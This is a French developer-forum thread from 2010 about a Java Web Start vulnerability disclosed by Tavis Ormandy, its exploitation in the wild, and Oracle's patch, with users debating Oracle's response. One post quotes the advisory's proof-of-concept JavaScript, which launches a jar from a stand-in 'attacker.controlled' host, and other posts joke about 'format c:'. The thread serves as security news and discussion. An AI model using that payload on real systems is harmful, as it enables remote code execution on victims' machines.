IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Vue hybride

Message précédent Message précédent   Message suivant Message suivant
  1. #1
    Membre expérimenté

    Inscrit en
    Juillet 2009
    Messages
    3 407
    Détails du profil
    Informations forums :
    Inscription : Juillet 2009
    Messages : 3 407
    Par défaut Une faille très sérieuse de Java permet de prendre le contrôle d'une machine, passez au JDK/JRE 6 Update 20
    Mise à jour du 15/04/10
    Oracle met à disposition une version correctrice du JRE/JDK : JDK 6 Update 20

    Comme vient de le rapporter HowHigH, Oracle-Sun vient de patcher en urgence la vulnérabilité en sortant un correctif de sécurité
    Les Release Notes
    Téléchargez la dernière version du JRE/JDK 6


    La vulnérabilité de Java déjà exploitée
    Depuis des serveurs russes, Oracle reste sur sa position


    La faille de Java récemment mise à jour par un ingénieur de Google (lire ci-avant) serait déjà exploitée.

    Roger Thompson, chef chercheur chez AVG, a repéré des attaques depuis des serveurs russes utilisés par des sites qui ciblent le grand public (comme Songlyrics.com, qui propose les paroles de chansons de Lady Gaga, Rihanna, etc.).

    En arrivant sur ce site, un iFrame malicieux camouflé dans une publicité redirige l'utilisateur (sans que celui-ci ne s'en aperçoive) vers un serveur hébergeant l'exploit.

    Lors de sa visite, le payload (autrement dit la "charge active" de l'attaque : le code sensé se télécharger sur la machine) n'était pas activé. Roger Thompson suppose donc que toute cette attaque était un test grandeur nature.

    "Le code impliqué [dans l'attaque] est très simple, ce qui le rend facile à reproduire, ce n'est donc pas surprenant que seulement cinq jours après [la découverte de la vulnérabilité de Java], nous détectons ce code dans une attaque qui utilise un serveur Russe" écrit-il sur son blog. Et d'appeler Sun a réagir au plus vite.

    Malheureusement, Oracle-Sun a déjà indiqué qu'à ses yeux cette vulnérabilité n'était pas assez importante pour rompre son cycle de sortie de mises à jour de sécurité. La faille restera donc non-patchée jusqu'à juillet.

    Pour mémoire, la vulnérabilité concerne Java Web Start, une fonctionnalité ajoutée depuis Java 6 qui permet aux développeurs de lancer plus facilement l'exécution de programmes depuis la machine de l'internaute. Une fonctionnalité à double tranchant (c'est en tout cas la présentation qu'en fait Thompson).

    La crainte de beaucoup d'éditeurs de solution de sécurité est de voir arriver un nouveau "toolkits" sur les forums de hackers qui permette d'automatiser l'attaque sans que le pirate n'ait la moindre ligne de code à écrire.

    Face aux accusations d'irresponsabilité qui se multiplient, Oracle reste silencieux (et sur sa position).

    En attendant la réponse du nouveau propriétaire de Sun, les recommandations de Tavis Ormandy, l'ingénieur de Goggle qui a découvert la vulnérabilité de Java, restent bonnes à connaître (lire ci-avant).


    Source : Le billet de Roger Thompson

    Et vous ?

    D'après vous, Oracle est-il "irresponsable" de ne pas sortir un patch en urgence, ou Roger Thompson et ses collègues donnent-ils dans le catastrophisme ?

    MAJ de Gordon Fowler


    Une faille de Java permettrait de prendre le contrôle d'une machine
    Oracle minimise la vulnérabilité découverte par un ingénieur de Google


    Un ingénieur de Google, Tavis Ormandy, vient de mettre à jour une faille de Java qui touche les versions Windows depuis la 6 update 10.

    Après avoir contacté Oracle, Ormandy a reçu pour réponse que la société "ne considère pas cette vulnérabilité suffisamment importante pour rompre le cycle trimestriel de réalisation des patchs". Une appréciation avec laquelle "il n'est pas d'accord".

    L'attaque que permet la faille est pourtant sérieuse puisqu'elle permet à un tiers de lancer un code malveillant et de prendre le contrôle de la machine.

    En résumé, la vulnérabilité vient du fait que Java permet à un développeur d'installer une librairie alternative au lancement d'une JVM. Il suffit donc de créer une librairie "malveillante" et de l'appeler pour lancer un code à l'insu de l'utilisateur.

    Selon Symantec, la faille toucherait également Linux - mais ne serait pas exploitable.

    Plus d'informations sur la faille et sur les parades à adopter en attendant le patch d'Oracle dans le communiqué de Ormandy.

    Source : Le communiqé de Tavis Ormandy et celle de Symantec



    Lire aussi

    Des vulnérabilités découvertes dans Java, déjà patchées par Oracle

    Les rubriques (actus, forums, tutos) de Développez.com :
    Java
    Sécurité
    Windows
    Linux

    Et vous ?

    Cette vulnérabilité vous parait-elle critique ?
    Et d'après vous, Oracle a-t-il raison de ne pas rompre son cycle de sortie de mises à jour de sécurité ?

  2. #2
    Expert éminent
    Avatar de Paul TOTH
    Homme Profil pro
    Freelance
    Inscrit en
    Novembre 2002
    Messages
    8 964
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 56
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : Freelance
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Novembre 2002
    Messages : 8 964
    Par défaut
    dont la plus simple pour le grand public est encore de désinstaller Java
    rolala !!! c'est un joli troll ça moi je propose

    - format c:
    - débrancher le câble réseau
    Developpez.com: Mes articles, forum FlashPascal
    Entreprise: Execute SARL
    Le Store Excute Store

  3. #3
    Membre expérimenté

    Inscrit en
    Juillet 2009
    Messages
    3 407
    Détails du profil
    Informations forums :
    Inscription : Juillet 2009
    Messages : 3 407
    Par défaut
    Citation Envoyé par Paul TOTH Voir le message
    rolala !!! c'est un joli troll ça moi je propose

    - format c:
    - débrancher le câble réseau
    Té non ! Pas de troll !!
    Je retire ce que j'ai dit. Voila c'est fait, j'ai rien dit...

  4. #4
    Membre éclairé Avatar de gmotw
    Profil pro
    Inscrit en
    Mars 2008
    Messages
    384
    Détails du profil
    Informations personnelles :
    Âge : 40
    Localisation : France

    Informations forums :
    Inscription : Mars 2008
    Messages : 384
    Par défaut
    De toute manière, il y a des méthodes plus simples indiqués sur le document.

    Par contre, j'ai pas tout capté comment utiliser correctement cette faille, mais ça a l'air de passer par navigateur, c'est ça? Tu envoies vers un lien avec dedans "-jar tonJarTropIvol.jar".

    Donc c'est bien le développeur qui fait son jar super-ivol-trop-méchant, et non pas un développeur qui utilise le jar d'un autre pour y rajouter une librairie pas-gentille-vilaine-bouh-pas-bien.

  5. #5
    Membre expérimenté

    Inscrit en
    Juillet 2009
    Messages
    3 407
    Détails du profil
    Informations forums :
    Inscription : Juillet 2009
    Messages : 3 407
    Par défaut
    Citation Envoyé par gmotw Voir le message
    Par contre, j'ai pas tout capté comment utiliser correctement cette faille, mais ça a l'air de passer par navigateur, c'est ça?
    Salut,

    T'as une démo (présentée comme sans risque ) ici de comment ça marche :
    http://lock.cmpxchg8b.com/bb5eafbc6c.../testcase.html

  6. #6
    Membre averti
    Profil pro
    Inscrit en
    Décembre 2009
    Messages
    39
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2009
    Messages : 39
    Par défaut
    Bof, comme d'habitude -dans sa config par défaut- cela nécessite l'approbation de l'utilisateur (regardez votre config de Java Web Start, vous verrez bien).
    Second point, si le JAR invoqué de manière détournée s'avère être dangereux, alors votre super-antivirus le détectera, comme d'hab.
    Le soucis est que l'on parle ici d'un individu sans antivirus (ou quelconque solution de sécurité) cliquant frénétiquement sur "Yes" et "Next".

    Alors si demander à l'utilisateur s'il veut installer XXX est ce qu'on appelle une faille de sécurité, je tiens à rappeler la plus grande faille toujours pas colmatée et exploitée depuis des temps immémoriaux : la bêtise humaine & son appétence à manipuler sans chercher à comprendre.

    Non vraiment, ça n'a rien de critique.

    [edit] Ajoutons que les paramètres de sécurité par défaut de Vista & Seven préviennent efficacement de ce genre de manip ^^.
    Rien à craindre donc.

  7. #7
    Membre éclairé Avatar de gmotw
    Profil pro
    Inscrit en
    Mars 2008
    Messages
    384
    Détails du profil
    Informations personnelles :
    Âge : 40
    Localisation : France

    Informations forums :
    Inscription : Mars 2008
    Messages : 384
    Par défaut
    Citation Envoyé par Gordon Fowler Voir le message
    Salut,

    T'as une démo (présentée comme sans risque ) ici de comment ça marche :
    http://lock.cmpxchg8b.com/bb5eafbc6c.../testcase.html
    Duh, proxy.

    Sinon sur le communiqué, il donne ça comme exemple:
    var o = document.createElement("OBJECT");
    o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
    o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
    Du coup, je voulais justement savoir pour les gens comme moi qui n'ont pas accès à l'autre document si c'était juste dans ce genre d'utilisation qu'il considérait la faille. (parce que du coup effectivement, c'est peut-être un peu moins catastrophique)

  8. #8
    Modérateur
    Avatar de wax78
    Homme Profil pro
    R&D - Palefrenier programmeur
    Inscrit en
    Août 2006
    Messages
    4 104
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 44
    Localisation : Belgique

    Informations professionnelles :
    Activité : R&D - Palefrenier programmeur
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Août 2006
    Messages : 4 104
    Par défaut
    Citation Envoyé par Paul TOTH Voir le message
    rolala !!! c'est un joli troll ça moi je propose

    - format c:
    - débrancher le câble réseau
    Derniere fois que j'ai écris "Format C: /Q" pour rire sur developpez dans le forum j'ai eu droit a un blâme
    (Alors que l'operation est impossible à effectuer si le systeme tourne mais bon...)
    (Les "ça ne marche pas", même écrits sans faute(s), vous porteront discrédit ad vitam æternam et malheur pendant 7 ans)

    N'oubliez pas de consulter les FAQ Java et les cours et tutoriels Java

  9. #9
    Membre actif
    Développeur informatique
    Inscrit en
    Janvier 2009
    Messages
    51
    Détails du profil
    Informations professionnelles :
    Activité : Développeur informatique

    Informations forums :
    Inscription : Janvier 2009
    Messages : 51
    Par défaut Oracle met à disposition une version correctrice du JRE/JDK : JDK 6 Update 20
    Après avoir contacté Oracle, Ormandy a reçu pour réponse que la société "ne considère pas cette vulnérabilité suffisamment importante..........


    Ah oui, c'est ça. Apres avoir nier ou minimiser l'attaque ils se sont données la peine de mettre une version correctrice du JRE/JDK. je trouve ça pas trop professionnel de la part de ORACLE-SUN.

  10. #10
    Membre averti
    Profil pro
    Inscrit en
    Décembre 2009
    Messages
    39
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2009
    Messages : 39
    Par défaut
    He ben.... je récapitule une fois de plus :
    - Oracle ne considère pas cette faille comme sérieuse. Certains sont d'accord, d'autres non. Comme d'hab quoi.
    - Les critiques enflammées fusent ici et là. Justifiées ? Discutable ET discuté
    - Oracle prend la peine de rompre le cycle établit des releases Java pour sortir un patch rapidement, à mon avis (et ce n'est qu'un avis) simplement pour une question d'image.
    - Le post juste au-dessus trouve que ça n'est pas professionnel. Dans ce cas quelle procédure aurait été professionnelle ? Réagir sans réfléchir le jour-même de la soit-disante ultra-super-grosse faille de sécurité, sortir un super-patch salvateur en 24h chrono sans même prendre le temps de faire tous les tests nécessaire, ceci pouvant mettre en péril la stabilité et la sécurité des JVM mises à jour ? Non mais sérieux quoi, un peu de bonne foi, l'attitude anti-Oracle primaire ça va un moment.

    La JVM n'est pas un petit logiciel CodeBlocks de 200ko conçu et maintenu par Toto et Machin, les deux gars au devblog 2.0 ultra réactif, c'est un truc un peu plus conséquent, avec énormément de clients. Un patch fait à la hâte peut avoir des effets de bord dramatiques (imaginez-vous les serveurs d'applications qui se crashent les uns après les autres ? Pouf paf patatra). Le récent patch d'Oracle étant déjà une véritable prouesse.
    Oracle a montré en peu de temps qu'il faisait mieux que Sun, et c'est très bien. C'est la fin d'une époque, c'est triste, mais c'est comme ça, et ça me va très bien.

    D'ailleurs, d'après vous, combien de sociétés mettent à jour les JVM de leurs serveurs d'applis le jour même de la sortie d'un patch ? Ben voilà. Chez nous on vient de passer à la 1.5

  11. #11
    Membre chevronné
    Profil pro
    Inscrit en
    Décembre 2003
    Messages
    476
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2003
    Messages : 476
    Par défaut
    Citation Envoyé par jaimepaslesmodozélés Voir le message
    - Le post juste au-dessus trouve que ça n'est pas professionnel. Dans ce cas quelle procédure aurait été professionnelle ? Réagir sans réfléchir le jour-même de la soit-disante ultra-super-grosse faille de sécurité, sortir un super-patch salvateur en 24h chrono sans même prendre le temps de faire tous les tests nécessaire, ceci pouvant mettre en péril la stabilité et la sécurité des JVM mises à jour ? Non mais sérieux quoi, un peu de bonne foi, l'attitude anti-Oracle primaire ça va un moment.
    Tu viens d'affirmer avec ironie que réagir sans réfléchir n'était pas professionnel.
    Tu ne le réalises apparemment pas, mais c'est ce que Oracle a fait :
    1. En affirmant sans étude et arguments pertinents que la faille était peu importante.
    2. Qu'en conséquence, ils ne feront pas un patch avant plusieurs mois.
    3. En sortant dans la précipitation, environ 48h après leur annonce précédente, un patch pour répondre aux 1ères constatations de l'exploitation de la faille.

    Si ca c'est réagir avec réflexion, je n'ose imaginer ce que cela aurait été si ils avaient réfléchi...
    Citation Envoyé par jaimepaslesmodozélés Voir le message
    Dans ce cas quelle procédure aurait été professionnelle ?
    - Avoir de la réserve/mesure dans leurs propos au lieu d'être aussi catégorique (surtout si c'est pour agir ensuite en contradiction avec ce qu'ils ont dit affirmé).
    - Analyser avant de conclure hâtivement.
    - Conclure avec des arguments.
    - Ne pas changer d'avis comme de chemises.

  12. #12
    Membre émérite Avatar de JoeChip
    Profil pro
    Inscrit en
    Septembre 2008
    Messages
    536
    Détails du profil
    Informations personnelles :
    Localisation : Belgique

    Informations forums :
    Inscription : Septembre 2008
    Messages : 536
    Par défaut
    Oracle est une grosse boîte ; les techniciens et les communicants ne sont pas les mêmes personnes... Il n'y a personne qui s'appelle "Oracle"... Pourtant vous en parlez comme d'une personne... Il peut y avoir une équipe technique qui s'occupe tout de suite du problème, sans pour autant que tout le staff d'Oracle soit au courant, d'autant que les structures ne doivent pas être encore tout à fait fusionnées... Beaucoup de bruit pour rien, quoi : déjà avec le build 19 et anti-virus débrayé, la pseudo "faille grave" ne marchait plus, du moins sur mon système... Ok, un peu de parano fait partie de la sécurité, mais pas la panique au moindre bruit...

  13. #13
    Membre confirmé

    Inscrit en
    Juin 2005
    Messages
    212
    Détails du profil
    Informations forums :
    Inscription : Juin 2005
    Messages : 212
    Billets dans le blog
    1
    Par défaut
    Citation Envoyé par tchize_ Voir le message
    En ce qui me concerne, j'enlevait 100m² de plafonnage dans mon chez moi, et j'ai trouvé des vulnérabilité de ma maison, qui serait sensible aux attaque de moustique et de pluie
    tu peux essayer le vinaigre contre les moustiques
    Citation Envoyé par joseph_p Voir le message
    Je connais un établissement financier qui, encore récemment, n'avait qu'IE6 comme navigateur...
    Rien que ça ? j'en connais un pour qui IE6 est encore la norme svp ! qui dit mieux (pire) ?

Discussions similaires

  1. Réponses: 10
    Dernier message: 28/10/2010, 10h47
  2. Réponses: 90
    Dernier message: 09/10/2010, 13h54
  3. Réponses: 4
    Dernier message: 12/04/2010, 18h05
  4. Réponses: 61
    Dernier message: 27/11/2009, 12h15
  5. Réponses: 0
    Dernier message: 26/08/2009, 08h26

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo